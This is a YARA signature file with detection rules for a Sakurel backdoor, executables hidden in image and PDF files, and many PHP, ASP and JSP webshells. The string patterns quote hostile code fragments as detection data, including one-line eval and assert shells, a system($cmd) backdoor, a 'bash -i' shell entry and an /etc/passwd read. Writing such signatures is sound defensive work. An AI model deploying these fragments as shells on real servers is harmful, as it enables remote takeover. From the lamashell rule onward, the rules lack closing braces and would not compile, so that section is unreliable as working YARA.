// https://otx.alienvault.com/pulse/55bb9a424637f238607a9e95
rule Sakurel_backdoor {
    // Written against exported Windows event-log text rather than a binary: the
    // identifiers appear to be grouped as two process-creation (4688) records,
    // one for sysprep.exe and one for the dropped MediaCenter.exe.
    meta:
        maltype = "Sakurel backdoor"
        ref = "https://github.com/reed1713"
        reference = "http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Sakurel.A#tab=2"
        description = "malware creates a process in the temp directory and performs the sysprep UAC bypass method."
    strings:
        // first event record
        $type = "Microsoft-Windows-Security-Auditing"
        $eventid = "4688"
        $data = "Windows\\System32\\sysprep\\sysprep.exe" nocase

        // second event record
        $type1 = "Microsoft-Windows-Security-Auditing"
        $eventid1 = "4688"
        $data1 = "AppData\\Local\\Temp\\MicroMedia\\MediaCenter.exe" nocase
    condition:
        all of them
}
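rule Embedded_EXE_Cloaking : maldoc {
    // A file whose magic says PNG/PDF/RTF/JPEG/GIF but which carries a DOS/PE
    // header somewhere inside. The DOS stub text is required to sit shortly
    // AFTER an "MZ" candidate, so stub text that happens to appear earlier in the
    // file cannot pair with an unrelated "MZ" byte pair further on.
    meta:
        description = "Detects an embedded executable in a non-executable file"
        author = "Florian Roth"
        date = "2015/02/27"
        score = 80
    strings:
        // carrier-format magic bytes; one of them must be at offset 0
        $noex_png = { 89 50 4E 47 }
        $noex_pdf = { 25 50 44 46 }
        $noex_rtf = { 7B 5C 72 74 66 31 }
        $noex_jpg = { FF D8 FF E0 }
        $noex_gif = { 47 49 46 38 }
        // every "MZ" byte pair in the file is a candidate header (two bytes, so many hits are expected)
        $mz  = { 4D 5A }
        // DOS stub messages that follow a real MZ header within a few dozen bytes
        $a1 = "This program cannot be run in DOS mode"
        $a2 = "This program must be run under Win32"
    condition:
        (
            ( $noex_png at 0 ) or
            ( $noex_pdf at 0 ) or
            ( $noex_rtf at 0 ) or
            ( $noex_jpg at 0 ) or
            ( $noex_gif at 0 )
        )
        and
        // Some stub string occurrence must lie in (mz, mz + 200) for some MZ candidate.
        // Checking only "@a1 < @mz[i] + 200" (the first occurrence, upper bound only)
        // is also true when the stub text precedes the MZ pair, hence the lower bound
        // and the inner loop over all occurrences.
        for any i in (1..#mz): (
            ( for any j in (1..#a1): ( @a1[j] > @mz[i] and @a1[j] < ( @mz[i] + 200 ) ) ) or
            ( for any k in (1..#a2): ( @a2[k] > @mz[i] and @a2[k] < ( @mz[i] + 200 ) ) )
        )
}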
// https://otx.alienvault.com/pulse/5979fd26f7cda54e5b57bdb6
// https://otx.alienvault.com/pulse/58d3d96c0ca5e3424e736e86
// https://otx.alienvault.com/pulse/5979f558481b4c2692f5f810
// https://otx.alienvault.com/pulse/59771d58481b4c67d4f5f810
// https://otx.alienvault.com/pulse/5979ed91a87db72373caeedb
// https://otx.alienvault.com/pulse/5978b2e00972110fbe362a39
// https://otx.alienvault.com/pulse/5978b1f9a87db72cd5caeeda
// https://otx.alienvault.com/pulse/5979ea54fcdea3380da198fc
// https://otx.alienvault.com/pulse/5979e956481b4c1cc1f5f811
// https://otx.alienvault.com/pulse/5979e8b2481b4c1c5bf5f810
// https://otx.alienvault.com/pulse/5979e791481b4c1b92f5f812
// https://otx.alienvault.com/pulse/5979b6e0481b4c745cf5f810
// https://otx.alienvault.com/pulse/5978b12b0972110e9c362a39
// https://otx.alienvault.com/pulse/591d7a844da2585782eaf2f6
// https://otx.alienvault.com/pulse/5977dddda87db701dccaeee1
rule chinese_spam_echoer : webshell {
    // PHP "printer" spam script: no time limit, PRC timezone, content buffer, index.php?host= link
    meta:
        author      = "Vlad https://github.com/vlad-s"
        date        = "2016/07/18"
        description = "Catches chinese PHP spam files (printers)"
    strings:
        $a = "set_time_limit(0)"
        $b = "date_default_timezone_set('PRC');"
        $c = "$Content_mb;"
        $d = "/index.php?host="
    condition:
        $a and $b and $c and $d
}
rule FSO_s_phpinj {
    // single-string rule on the "Click Here to Exploit" link echo
    meta:
        description = "Webshells Auto-generated - file phpinj.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "dd39d17e9baca0363cc1c3664e608929"
    strings:
        $s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
    condition:
        $s4
}
rule webshell_webshells_new_php5 {
    // Obfuscated opener: chr(99).chr(104).chr(114) builds "chr", which is then used
    // to assemble "eval" (101,118,97,108) character by character.
    meta:
        description = "Web shells - generated from file php5.php"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "cf2ab009cbd2576a806bfefb74906fdf"
    strings:
        $s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
    condition:
        $s0
}
rule multiple_php_webshells_2 {
    // Super rule across several c99-family shells; all three fragments are required.
    meta:
        description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
        hash1 = "3ca5886cd54d495dc95793579611f59a"
        hash2 = "9c5bb5e3a46ec28039e8986324e42792"
        hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
        hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
        hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
        hash6 = "09609851caa129e40b0d56e90dfc476c"
        hash7 = "671cad517edd254352fe7e0c7c981c39"
    strings:
        $s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
        $s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
        $s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
    condition:
        $s0 and $s1 and $s3
}
rule webshell_Java_Shell {
    // JSP shell built around a Jython console class; either source line is enough
    meta:
        description = "Web Shell - file Java Shell.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "36403bc776eb12e8b7cc0eb47c8aac83"
    strings:
        $s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
        $s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
    condition:
        any of them
}
rule webshell_PH_Vayv_PH_Vayv : webshell {
    // matches on the shell's inline CSS / markup fragments; either one fires the rule
    meta:
        description = "Web Shell - file PH Vayv.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "35fb37f3c806718545d97c6559abd262"
    strings:
        $s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
        $s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
    condition:
        any of them
}
rule Debug_dllTest_2 {
    // debug-build PDB path plus a help-text line; both required
    meta:
        description = "Webshells Auto-generated - file dllTest.dll"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "1b9e518aaa62b15079ff6edb412b21e9"
    strings:
        $s4 = "\\Debug\\dllTest.pdb"
        $s5 = "--list the services in the computer"
    condition:
        $s4 and $s5
}
rule PHP_shell {
    // two fragments of the shell's encoded payload blob; both required
    meta:
        description = "Webshells Auto-generated - file shell.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
    strings:
        $s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
        $s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
    condition:
        $s0 and $s11
}
rule BackDooR__fr_ {
    // single-string rule on the shell's "Exploit include" banner print
    meta:
        description = "Webshells Auto-generated - file BackDooR (fr).php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "a79cac2cf86e073a832aaf29a664f4be"
    strings:
        $s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
    condition:
        $s3
}
rule webshell_Sst_Sheller {
    // file-manager link builder plus the multi-unlink cleanup line; both required
    meta:
        description = "Web Shell - file Sst-Sheller.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "d93c62a0a042252f7531d8632511ca56"
    strings:
        $s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
        $s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
    condition:
        $s2 and $s3
}
rule RemExp_asp {
    // ASP "Remote Explorer" file manager; any two of the three fragments
    meta:
        description = "Semi-Auto-generated  - file RemExp.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "aa1d8491f4e2894dbdb91eec1abc2244"
    strings:
        $s0 = "<title>Remote Explorer</title>"
        $s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
        $s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
    condition:
        2 of ($s*)
}
rule webshell_asp_Rader {
    // inline CSS fragment plus the help-popup onClick handler; both required
    meta:
        description = "Web Shell - file Rader.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "ad1a362e0a24c4475335e3e891a01731"
    strings:
        $s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
        $s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
    condition:
        $s1 and $s3
}
rule multiple_webshells_0019 {
    // Super rule for c99madshell-style shells; a single fragment is enough.
    meta:
        description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php"
        hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
        hash1 = "3ca5886cd54d495dc95793579611f59a"
        hash2 = "9c5bb5e3a46ec28039e8986324e42792"
    strings:
        $s0 = "<b>Dumped! Dump has been writed to "
        $s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
        $s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
    condition:
        any of them
}
rule FSO_s_ntdaddy {
    // single-string rule on the command input form of the NTDaddy ASP shell
    meta:
        description = "Webshells Auto-generated - file ntdaddy.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
    strings:
        $s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
    condition:
        $s1
}
rule simple_backdoor_php {
    // Same sample hash as webshell_simple_backdoor; this variant keys on the author
    // banner and usage comment as well as the request-parameter assignment.
    meta:
        description = "Semi-Auto-generated  - file simple-backdoor.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "f091d1b9274c881f8e41b2f96e6b9936"
    strings:
        $s0 = "$cmd = ($_REQUEST['cmd']);" fullword
        $s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->"
        $s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
    condition:
        2 of ($s*)
}
rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
    // "Safe Mode Shell" by PHP Emperor; any three of the six fragments
    meta:
        description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
        author = "Florian Roth"
        hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
    strings:
        $s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
        $s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
        $s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
        $s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
        $s15 = "if(empty($_GET['file'])){" fullword
        $s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
    condition:
        3 of ($s*)
}
rule Ajax_PHP_Command_Shell_php {
    // UI text fragments of the Ajax command shell; a single one is enough
    meta:
        description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "93d1a2e13a3368a2472043bd6331afe9"
    strings:
        $s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
        $s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
        $s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><form enct"
    condition:
        any of them
}
rule webshell_Ani_Shell {
    // embedded Python payload marker and the shell's banner separators; any one fires
    meta:
        description = "Web Shell - file Ani-Shell.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "889bfc9fbb8ee7832044fc575324d01a"
    strings:
        $s0 = "$Python_CODE = \"I"
        $s6 = "$passwordPrompt = \"\\n================================================="
        $s7 = "fputs ($sockfd ,\"\\n==============================================="
    condition:
        any of them
}
rule Mithril_v1_45_Mithril {
    // companion binary name plus the debug path fragment; both required
    // (Debug_cress is the mirror rule written for cress.exe)
    meta:
        description = "Webshells Auto-generated - file Mithril.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "f1484f882dc381dde6eaa0b80ef64a07"
    strings:
        $s2 = "cress.exe"
        $s7 = "\\Debug\\Mithril."
    condition:
        $s2 and $s7
}
rule NT_Addy_asp {
    // NTDaddy banner and UI strings; a single one is enough
    meta:
        description = "Semi-Auto-generated  - file NT Addy.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "2e0d1bae844c9a8e6e351297d77a1fec"
    strings:
        $s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
        $s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
        $s4 = "RAW D.O.S. COMMAND INTERFACE"
    condition:
        any of them
}
rule multiple_webshells_0016 {
    // Super rule for the r57 / spy shell family; any two of the three fragments.
    meta:
        description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php"
        hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
        hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
        hash2 = "8023394542cddf8aee5dec6072ed02b5"
        hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
        hash4 = "817671e1bdc85e04cc3440bbd9288800"
    strings:
        $s1 = "if(rmdir($_POST['mk_name']))"
        $s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
        $s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
    condition:
        2 of ($s*)
}
rule dbgiis6cli {
    // hard-coded User-Agent plus the client's command prompt text; both required
    meta:
        description = "Webshells Auto-generated - file dbgiis6cli.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "3044dceb632b636563f66fee3aaaf8f3"
    strings:
        $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
        $s5 = "###command:(NO more than 100 bytes!)"
    condition:
        $s0 and $s5
}
rule WebShell_reader_asp_php {
    // markup / CSS fragments of the shell page; any three of the four
    meta:
        description = "PHP Webshells Github Archive - file reader.asp.php.txt"
        author = "Florian Roth"
        hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
    strings:
        $s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"
        $s12 = " HACKING " fullword
        $s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
        $s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
    condition:
        3 of ($s*)
}
rule hidshell_php_php {
    // single-string rule on the opening encoded-blob assignment
    meta:
        description = "Semi-Auto-generated  - file hidshell.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "c2f3327d60884561970c63ffa09439a4"
    strings:
        $s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
    condition:
        $s0
}
rule Debug_cress {
    // path fragment plus companion binary name; both required
    // (Mithril_v1_45_Mithril is the mirror rule written for Mithril.exe)
    meta:
        description = "Webshells Auto-generated - file cress.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "36a416186fe010574c9be68002a7286a"
    strings:
        $s0 = "\\Mithril "
        $s4 = "Mithril.exe"
    condition:
        $s0 and $s4
}
rule Webshell_Ayyildiz {
    // directory-selector markup shared by several PHP shells; both lines plus a size cap
    meta:
        description = "Detects Webshell - rule generated from from files Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt, Macker's Private PHPShell.php, matamu.txt, myshell.txt, PHP Shell.txt"
        author = "Florian Roth"
        reference = "https://github.com/nikicat/web-malware-collection"
        date = "2016-01-11"
        score = 70
        hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"
        hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"
        hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"
        hash4 = "77a63b26f52ba341dd2f5e8bbf5daf05ebbdef6b3f7e81cec44ce97680e820f9"
        hash5 = "61c4fcb6e788c0dffcf0b672ae42b1676f8a9beaa6ec7453fc59ad821a4a8127"
    strings:
        $s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
        $s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
    condition:
        filesize < 112KB and $s0 and $s1
}
rule webshell_webshells_new_radhat {
    // single-string rule on the character-array obfuscation used by radhat.asp
    meta:
        description = "Web shells - generated from file radhat.asp"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "72cb5ef226834ed791144abaa0acdfd4"
    strings:
        $s1 = "sod=Array(\"D\",\"7\",\"S"
    condition:
        $s1
}
rule phpshell17_php {
    // template placeholders left in the shell's HTML; a single one is enough
    meta:
        description = "Semi-Auto-generated  - file phpshell17.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "9a928d741d12ea08a624ee9ed5a8c39d"
    strings:
        $s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
        $s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
        $s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
    condition:
        any of them
}
rule backupsql_php_often_with_c99shell {
    // commented-out MIME attachment line plus the ncftpput upload command; both required
    meta:
        description = "Semi-Auto-generated  - file backupsql.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
    strings:
        $s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
        $s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
    condition:
        $s2 and $s4
}
rule webshell_caidao_shell_ice_2 {
    // one-line China Chopper style shell: eval of the POST parameter "ice"
    meta:
        description = "Web Shell - file ice.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "1d6335247f58e0a5b03e17977888f5f2"
    strings:
        $s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
    condition:
        $s0
}
rule WebShell_php_include_w_shell {
    // debug comment, shell-app config entry and host-count output; a single one is enough
    meta:
        description = "PHP Webshells Github Archive - file php-include-w-shell.php"
        author = "Florian Roth"
        hash = "1a7f4868691410830ad954360950e37c582b0292"
    strings:
        $s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
        $s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
        $s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
    condition:
        any of them
}
rule ak74shell_php_php {
    // Note: $s3 ("$xshell") is contained in $s1, so $s1 alone already satisfies the
    // two-string threshold; $s3 effectively only pairs with the team banner $s2.
    meta:
        description = "Semi-Auto-generated  - file ak74shell.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "7f83adcb4c1111653d30c6427a94f66f"
    strings:
        $s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
        $s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
        $s3 = "$xshell"
    condition:
        2 of ($s*)
}
rule DarkSecurityTeam_Webshell {
    // single-string rule on the ASP form that executes a session-stored payload
    meta:
        description = "Dark Security Team Webshell"
        author = "Florian Roth"
        hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
        score = 50
    strings:
        $s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
    condition:
        $s0
}
rule commands {
    // victim-tracking SQL fragment plus the proxy-header array; both required
    meta:
        description = "Webshells Auto-generated - file commands.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "174486fe844cb388e2ae3494ac2d1ec2"
    strings:
        $s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
        $s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
    condition:
        $s1 and $s2
}
rule r57shell_3 {
    // single short fragment: echo of the POSTed command inside a <b> tag
    meta:
        description = "Webshells Auto-generated - file r57shell.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "87995a49f275b6b75abe2521e03ac2c0"
    strings:
        $s1 = "<b>\".$_POST['cmd']"
    condition:
        $s1
}
rule webshell_simple_backdoor {
    // Same sample hash as simple_backdoor_php; this variant keys on the three
    // code lines (parameter check, assignment, system() call) rather than the banner.
    meta:
        description = "Web Shell - file simple-backdoor.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "f091d1b9274c881f8e41b2f96e6b9936"
    strings:
        $s0 = "$cmd = ($_REQUEST['cmd']);" fullword
        $s1 = "if(isset($_REQUEST['cmd'])){" fullword
        $s4 = "system($cmd);" fullword
    condition:
        2 of ($s*)
}
rule webshell_php_sh_server : webshell {
    // single-string rule: code passed in via an environment variable is eval'd
    meta:
        description = "Web Shell - file server.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 50
        hash = "d87b019e74064aa90e2bb143e5e16cfa"
    strings:
        $s0 = "eval(getenv('HTTP_CODE'));" fullword
    condition:
        $s0
}
rule webshell_redirect {
    // single-string rule on the client-side flag builder of redirect.asp
    meta:
        description = "Web Shell - file redirect.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "97da83c6e3efbba98df270cc70beb8f8"
    strings:
        $s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
    condition:
        $s7
}
rule WebShell_RemExp_asp_php {
    // Stricter sibling of RemExp_asp ($s7 here is that rule's $s4): all five
    // fragments of the ASP file manager are required.
    meta:
        description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
        author = "Florian Roth"
        hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
    strings:
        $s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
        $s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
        $s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
        $s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
        $s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
    condition:
        all of ($s*)
}
rule lamashell_php {
   	// lamashell.php: product name, the POSTed "king" command check, and the
   	// move_uploaded_file() handler for the "fila" upload. Any one string fires;
   	// the upload handler is the least specific of the three.
   	meta:
   		description = "Semi-Auto-generated  - file lamashell.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "de9abc2e38420cad729648e93dfc6687"
   	strings:
   		$s0 = "lama's'hell" fullword
   		$s1 = "if($_POST['king'] == \"\") {"
   		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
   	condition:
   		1 of them
rule WebShell_php_webshells_lolipop {
   	// lolipop.php: POSTed "commander" and "sourcego" parameters plus a
   	// mysql_query() on the $loli12 variable. All three required.
   	meta:
   		description = "PHP Webshells Github Archive - file lolipop.php"
   		author = "Florian Roth"
   		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
   	strings:
   		$s3 = "$commander = $_POST['commander']; " fullword
   		$s9 = "$sourcego = $_POST['sourcego']; " fullword
   		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
   	condition:
   		all of them
rule PHP_Shell_php_php {
   	// "PHP Shell.php": two echoed <form> tags whose action is built from
   	// $SFileName?$urlAdd (one lower-case, one upper-case "post"). Both needed.
   	meta:
   		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
   	strings:
   		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
   		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
   	condition:
   		all of them
rule WebShell_JspWebshell_1_2_2 {
   	// JspWebshell 1.2: GBK page directive, a "command" request parameter
   	// check, RandomAccessFile pointer handling and a debug println. The page
   	// directive ($s3) and the commented-out getParameter line ($s4) are weak
   	// on their own, which is why three of five are required.
   	meta:
   		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
   		author = "Florian Roth"
   		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
   	strings:
   		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
   		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
   		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
   		$s15 = "endPoint=random1.getFilePointer();" fullword
   		$s20 = "if (request.getParameter(\"command\") != null) {" fullword
   	condition:
   		3 of them
rule PHP_Backdoor_v1 {
   	// "PHP Backdoor v1": self-referencing form and link built from
   	// $_SERVER['PHP_SELF'] with "?edit=" and "?proxy" query parameters.
   	// Both literals are required.
   	meta:
   		description = "Webshells Auto-generated - file PHP Backdoor v1.php"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "0506ba90759d11d78befd21cabf41f3d"
   	strings:

   		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
   		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
   	condition:
   		all of them
rule webshell_php_2 {
   	// 2.php: the one-line assert() of the "c" request parameter. The literal
   	// ends with a space before the closing quote and is fullword, so an
   	// otherwise identical file without that trailing space is not matched.
   	meta:
   		description = "Web Shell - file 2.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "267c37c3a285a84f541066fc5b3c1747"
   	strings:
   		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
   	condition:
   		all of them
rule WebShell_simattacker {
   	// simattacker.php: banner, author and contact lines plus two code lines.
   	// Any two suffice. $s17 is a stock error_reporting() call and $s20 a plain
   	// POST read, so those two together can satisfy the rule on benign code;
   	// prefer a hit that includes one of the banner strings.
   	meta:
   		description = "PHP Webshells Github Archive - file simattacker.php"
   		author = "Florian Roth"
   		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
   	strings:
   		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
   		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
   		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword
   		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
   		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword
   		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
   		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
   		$s20 = "$Comments=$_POST['Comments'];" fullword
   	condition:
   		2 of them
rule WebShell_php_webshells_README {
   	// Matches the README.md of the php-webshells archive, not a shell. A hit
   	// means a copy of that collection is on disk -- which includes a
   	// researcher's or defender's own checkout -- so judge by context.
   	meta:
   		description = "PHP Webshells Github Archive - file README.md"
